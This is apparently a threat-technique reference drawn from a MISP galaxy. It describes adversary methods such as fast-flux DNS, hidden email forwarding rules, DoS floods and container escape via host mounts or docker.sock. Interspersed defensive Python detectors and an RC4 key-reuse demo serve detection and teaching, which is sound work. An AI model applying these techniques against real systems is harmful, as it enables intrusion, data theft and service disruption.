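def flux_verdicts(observations, ttl_max=300, min_ips=5, min_prefixes=4, min_ns=3):
    """Classify names from repeated resolutions.

    observations: (timestamp, name, rrtype, rdata, ttl) tuples collected over time.
    Rules (thresholds are assumptions, tune them to your resolver data):
      single: TTL at or below ttl_max, many distinct A records across many /16s
      double: single, plus a churning NS set observed for the same zone
    Returns {name: "single" | "double" | None}.
    """
    a_records = defaultdict(set)
    ns_records = defaultdict(set)
    min_ttl = {}
    for _, name, rrtype, rdata, ttl in observations:
        if rrtype == "A":
            a_records[name].add(rdata)
        elif rrtype == "NS":
            ns_records[name].add(rdata)
        min_ttl[name] = min(min_ttl.get(name, ttl), ttl)

    verdicts = {}
    for name in set(a_records) | set(ns_records):
        ips = a_records[name]
        prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips}
        low_ttl = min_ttl[name] <= ttl_max
        single = low_ttl and len(ips) >= min_ips and len(prefixes) >= min_prefixes
        double = single and len(ns_records[name]) >= min_ns
        verdicts[name] = "double" if double else "single" if single else None
    return verdicts


def sample_observations():
    """Constructed resolver observations for three names."""
    obs = []
    # flux.example: a new address every minute, each in a different /16,
    # TTL 180, and the zone's NS set rotates as well (double-flux).
    flux_ips = ["203.0.113.10", "198.51.100.7", "192.0.2.44", "100.64.3.9",
                "10.20.1.5", "172.16.9.9", "192.168.77.3", "10.99.4.4"]
    for i, ip in enumerate(flux_ips):
        obs.append((f"2024-03-01T00:{i:02d}:00", "flux.example", "A", ip, 180))
    for i, ns in enumerate(["ns1.flux.example", "ns7.flux.example", "ns3.flux.example"]):
        obs.append((f"2024-03-01T00:{i:02d}:30", "flux.example", "NS", ns, 180))
    # cdn.example: many addresses, short TTL, but all inside one provider block.
    for i in range(6):
        obs.append((f"2024-03-01T00:{i:02d}:00", "cdn.example", "A", f"203.0.113.{20 + i}", 60))
    obs.append(("2024-03-01T00:00:00", "cdn.example", "NS", "ns1.cdn.example", 3600))
    # static.example: a stable pair of addresses with a day-long TTL.
    obs.append(("2024-03-01T00:00:00", "static.example", "A", "192.0.2.1", 86400))
    obs.append(("2024-03-01T01:00:00", "static.example", "A", "192.0.2.2", 86400))
    return obs


if __name__ == "__main__":
    for name, verdict in sorted(flux_verdicts(sample_observations()).items()):
        print(f"{name:16} {verdict}")
```

Without the prefix-diversity test `cdn.example` would be reported as single-flux, which is the classic false positive of TTL-and-count rules; passive DNS with ASN data makes a better diversity measure than the /16 stand-in used here.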

The tag is: misp-galaxy:technique="Fast Flux DNS"

Dynamic Resolution

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server, malware may employ dynamic resolution as a means of reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>

The tag is: misp-galaxy:technique="Dynamic Resolution"

Email Forwarding Rule

Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup> Furthermore, email forwarding rules can allow adversaries to maintain persistent access to a victim’s emails even after compromised credentials are reset by administrators.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup> Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.<sup>[[Microsoft Tim McMichael Exchange Mail Forwarding 2](https://app.tidalcyber.com/references/b5bf8e12-0133-46ea-85e3-b48c9901b518)]</sup><sup>[[Mac Forwarding Rules](https://app.tidalcyber.com/references/0ff40575-cd2d-4a70-a07b-fff85f520062)]</sup>

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup>

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.
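An added example (not code from the galaxy or from Microsoft) covering the three places forwarding can be configured in Exchange Online: an inbox rule (`New-InboxRule`/`Set-InboxRule`), a mailbox-level forwarding address (`Set-Mailbox`), and an organisation-wide transport rule (`New-TransportRule`/`Set-TransportRule`). It reads audit records in the shape of the Microsoft 365 unified audit log (`Operation`, `UserId`, `Parameters` as name/value pairs), trimmed to those fields, and reports every destination with its scope and whether it is outside the organisation. The records, the actors and the domains `corp.example` and `mail.example` are constructed; `INTERNAL_DOMAINS` is an assumption to replace with your own.

```python
import json
import re

INTERNAL_DOMAINS = {"corp.example"}          # assumption: the organisation's own mail domains

# Cmdlets and the parameters on them that send mail somewhere else.
FORWARDING_PARAMS = {
    "New-InboxRule": ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"),
    "Set-InboxRule": ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"),
    "Set-Mailbox": ("ForwardingSmtpAddress", "ForwardingAddress"),
    "New-TransportRule": ("BlindCopyTo", "RedirectMessageTo", "AddToRecipients", "CopyTo"),
    "Set-TransportRule": ("BlindCopyTo", "RedirectMessageTo", "AddToRecipients", "CopyTo"),
}
# Pulls bare addresses out of values such as "smtp:user@domain" or display-name forms.
ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed audit records in the shape of the Microsoft 365 unified audit log,
# trimmed to the fields this check reads.
SAMPLE_AUDIT = json.dumps([
    {"CreationTime": "2024-03-01T08:12:00", "Operation": "New-InboxRule",
     "UserId": "alice@corp.example",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardAsAttachmentTo", "Value": "drop@mail.example"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2024-03-01T08:30:00", "Operation": "Set-Mailbox",
     "UserId": "admin@corp.example",
     "Parameters": [{"Name": "Identity", "Value": "bob"},
                    {"Name": "ForwardingSmtpAddress", "Value": "smtp:bob.backup@mail.example"},
                    {"Name": "DeliverToMailboxAndForward", "Value": "True"}]},
    {"CreationTime": "2024-03-01T09:00:00", "Operation": "New-TransportRule",
     "UserId": "admin@corp.example",
     "Parameters": [{"Name": "Name", "Value": "Journal finance"},
                    {"Name": "SubjectContainsWords", "Value": "invoice"},
                    {"Name": "BlindCopyTo", "Value": "archive@corp.example"}]},
    {"CreationTime": "2024-03-01T09:15:00", "Operation": "New-InboxRule",
     "UserId": "carol@corp.example",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Archive"}]},
])


def forwarding_findings(records):
    """One finding per destination address a rule or mailbox setting sends mail to,
    with scope (one mailbox vs the whole organisation) and whether the
    destination is outside the organisation."""
    findings = []
    for rec in records:
        op = rec.get("Operation", "")
        params = {p["Name"]: str(p["Value"]) for p in rec.get("Parameters", [])}
        for param in FORWARDING_PARAMS.get(op, ()):
            if param not in params:
                continue
            for addr in ADDR_RE.findall(params[param]):
                domain = addr.rsplit("@", 1)[1].lower()
                findings.append({
                    "time": rec.get("CreationTime"),
                    "actor": rec.get("UserId"),
                    "operation": op,
                    "parameter": param,
                    "target": addr,
                    "external": domain not in INTERNAL_DOMAINS,
                    "scope": "organisation" if "TransportRule" in op else "mailbox",
                    # A rule that also deletes the message hides the forwarding from the owner.
                    "deletes_original": params.get("DeleteMessage") == "True",
                })
    return findings


def load_sample():
    return json.loads(SAMPLE_AUDIT)


if __name__ == "__main__":
    for f in forwarding_findings(load_sample()):
        flag = "EXTERNAL" if f["external"] else "internal"
        print(f'{f["time"]} {f["actor"]:20} {f["operation"]:18} {f["scope"]:12} -> {f["target"]} [{flag}]')
```

Work from the audit log rather than from the current rule list: a rule hidden through MAPI, as described above, will not appear in Outlook, OWA or `Get-InboxRule`, but the record of its creation remains. A rule named "." that forwards as attachment and deletes the original, as in the first sample record, is a shape worth its own alert.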

The tag is: misp-galaxy:technique="Email Forwarding Rule"

Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.<sup>[[Outlook File Sizes](https://app.tidalcyber.com/references/6fbbb53f-cd4b-4ce1-942d-5cadb907cf86)]</sup> IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.<sup>[[Microsoft Outlook Files](https://app.tidalcyber.com/references/29f4cc6b-1fa5-434d-ab4f-6bb169e2287a)]</sup>

The tag is: misp-galaxy:technique="Local Email Collection"

Remote Email Collection

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user’s credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://app.tidalcyber.com/software/d762974a-ca7e-45ee-bc1d-f5218bf46c84) can be used to automate searches for specific keywords.

The tag is: misp-galaxy:technique="Remote Email Collection"

Email Collection

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: misp-galaxy:technique="Email Collection"

Asymmetric Cryptography

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53).

The tag is: misp-galaxy:technique="Asymmetric Cryptography"

Symmetric Cryptography

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:technique="Symmetric Cryptography"

Encrypted Channel

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
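The caveat above, and the RC4 entry in the Symmetric Cryptography list, are easiest to see in code. This added example (not code from the galaxy, from ATT&CK, or from any malware family) implements RC4 in pure Python, encrypts two beacons with a hypothetical hardcoded key the way an implant with a static key does, decrypts a captured blob with the key recovered from the sample, and then shows the second failure: with a static key and no per-message nonce every message reuses the same keystream, so XOR-ing two ciphertexts cancels it and reveals where the plaintexts differ without any key at all. The key `b"Key"` and the beacon contents are constructed.

```python
# Hypothetical static key, as if pulled from the sample's strings section.
HARDCODED_KEY = b"Key"


def rc4(key, data):
    """RC4 (KSA + PRGA). The same function encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encrypt_beacon(plaintext, key=HARDCODED_KEY):
    """What the implant does: no nonce, no per-session key, just the static key."""
    return rc4(key, plaintext)


def decrypt_capture(hex_blob, key=HARDCODED_KEY):
    """What the analyst does with the key recovered from the sample."""
    return rc4(key, bytes.fromhex(hex_blob))


def differing_positions(ct1, ct2):
    """Keystream reuse: ct1 XOR ct2 == pt1 XOR pt2, so the positions where two
    captured beacons differ are visible without the key at all."""
    return [i for i, (a, b) in enumerate(zip(ct1, ct2)) if a != b]


if __name__ == "__main__":
    c1 = encrypt_beacon(b"id=42;cmd=idle")
    c2 = encrypt_beacon(b"id=42;cmd=exec")
    print(c1.hex(), c2.hex())
    print(decrypt_capture(c1.hex()))
    print(differing_positions(c1, c2))   # only the command bytes differ
```

The two published RC4 test vectors (`Key`/`Plaintext` and `Wiki`/`pedia`) are asserted in the test so the implementation can be trusted before it is pointed at a real capture. The same reasoning applies to AES in CTR or CBC mode with a fixed key and IV: the algorithm being standard is not what protects the channel, the key management is.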

The tag is: misp-galaxy:technique="Encrypted Channel"

Application Exhaustion Flood

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup>

The tag is: misp-galaxy:technique="Application Exhaustion Flood"

Application or System Exploitation

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users.<sup>[[Sucuri BIND9 August 2015](https://app.tidalcyber.com/references/5e108782-2f32-4704-be01-055d9e767216)]</sup> Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34), [Firmware Corruption](https://app.tidalcyber.com/technique/559c647a-7759-4943-856d-dc717b5a443e), [Service Stop](https://app.tidalcyber.com/technique/e27c5756-f43e-424f-af62-b21e8b304e5d) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

The tag is: misp-galaxy:technique="Application or System Exploitation"

OS Exhaustion Flood

Adversaries may launch a denial of service (DoS) attack targeting an endpoint’s operating system (OS). A system’s OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.<sup>[[Cloudflare SynFlood](https://app.tidalcyber.com/references/e292c4fe-ae77-4393-b666-fb6290cb4aa8)]</sup>

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets is sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.<sup>[[Corero SYN-ACKflood](https://app.tidalcyber.com/references/ec41de8a-c673-41bf-b713-4a647b135532)]</sup>

The tag is: misp-galaxy:technique="OS Exhaustion Flood"

Service Exhaustion Flood

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.<sup>[[Cloudflare HTTPflood](https://app.tidalcyber.com/references/1a5934a4-35ce-4f7c-be9c-c1faf4ee0838)]</sup>

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.<sup>[[Arbor SSLDoS April 2012](https://app.tidalcyber.com/references/b5de4376-0deb-45de-83a0-09df98480464)]</sup>

The tag is: misp-galaxy:technique="Service Exhaustion Flood"

Endpoint Denial of Service

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.<sup>[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]</sup>

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).

The tag is: misp-galaxy:technique="Endpoint Denial of Service"

Escape to Host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.<sup>[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]</sup>

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.<sup>[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)]</sup><sup>[[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)]</sup><sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup><sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup><sup>[[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)]</sup><sup>[[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]</sup>

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a Container Administration Command.<sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup> Adversaries may also escape via [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.<sup>[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]</sup>

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.
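The configurations named above (a bind mount of the host filesystem, a privileged container, a mounted runtime socket) are all visible in `docker inspect` output before anyone abuses them. This added example (not code from the galaxy, from ATT&CK, or from Docker) walks the `HostConfig` section of that output and reports the settings that make an escape cheap; the host PID namespace and added capabilities are included because they belong to the same review, although the text above does not list them. The three containers `web`, `agent` and `debug` and their settings are constructed; the JSON is trimmed to the fields the check reads.

```python
import json

SENSITIVE_HOST_PATHS = {"/etc", "/root", "/proc", "/sys", "/boot", "/dev", "/var/lib/docker"}
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "SYS_RAWIO", "DAC_READ_SEARCH"}

# Constructed `docker inspect` output, trimmed to the fields this check reads.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "Binds": ["/srv/web/static:/usr/share/nginx/html:ro"],
                    "CapAdd": None, "PidMode": ""}},
    {"Name": "/agent",
     "HostConfig": {"Privileged": True,
                    "Binds": ["/:/host", "/var/run/docker.sock:/var/run/docker.sock"],
                    "CapAdd": None, "PidMode": ""}},
    {"Name": "/debug",
     "HostConfig": {"Privileged": False, "Binds": None,
                    "CapAdd": ["SYS_MODULE"], "PidMode": "host"}},
])


def _bind_source(bind):
    """HostConfig.Binds entries are 'host_path:container_path[:options]'."""
    return bind.split(":", 1)[0]


def escape_risks(inspect_json):
    """Return (container, finding) pairs for settings that make Escape to Host cheap."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "?").lstrip("/")
        hc = container.get("HostConfig") or {}
        if hc.get("Privileged"):
            findings.append((name, "privileged: all capabilities and host devices, kernel modules loadable"))
        for bind in hc.get("Binds") or []:
            src = _bind_source(bind)
            if src == "/":
                findings.append((name, f"host root filesystem mounted ({bind}): drop files, edit cron on the host"))
            elif src.endswith("docker.sock"):
                findings.append((name, f"runtime socket mounted ({bind}): can start a new privileged container"))
            elif src.rstrip("/") in SENSITIVE_HOST_PATHS:
                findings.append((name, f"sensitive host path mounted ({bind})"))
        if hc.get("PidMode") == "host":
            findings.append((name, "host PID namespace shared: host processes visible from inside"))
        for cap in hc.get("CapAdd") or []:
            if cap.upper().replace("CAP_", "") in DANGEROUS_CAPS:
                findings.append((name, f"capability added: {cap}"))
    return findings


if __name__ == "__main__":
    for container, finding in escape_risks(SAMPLE_INSPECT):
        print(f"{container:8} {finding}")
```

Run it as `docker inspect $(docker ps -q) | python3 escape_risks.py` with a small wrapper that reads stdin; on Kubernetes the same fields surface as `securityContext.privileged`, `hostPID` and `hostPath` volumes in the pod spec, and the review is the same.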

The tag is: misp-galaxy:technique="Escape to Host"

Cloud Accounts

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>

Creating [Cloud Accounts](https://app.tidalcyber.com/technique/4c7e52b1-9881-4966-b9b5-d88c5e88d604) may also require adversaries to establish [Email Accounts](https://app.tidalcyber.com/technique/1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb) to register with the cloud provider.

The tag is: misp-galaxy:technique="Cloud Accounts"

Email Accounts

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or Phishing.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup> Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.<sup>[[Trend Micro R980 2016](https://app.tidalcyber.com/references/6afd89ba-2f51-4192-82b3-d961cc86adf1)]</sup>

The tag is: misp-galaxy:technique="Email Accounts"

Social Media Accounts

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media Accounts"

Establish Accounts

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

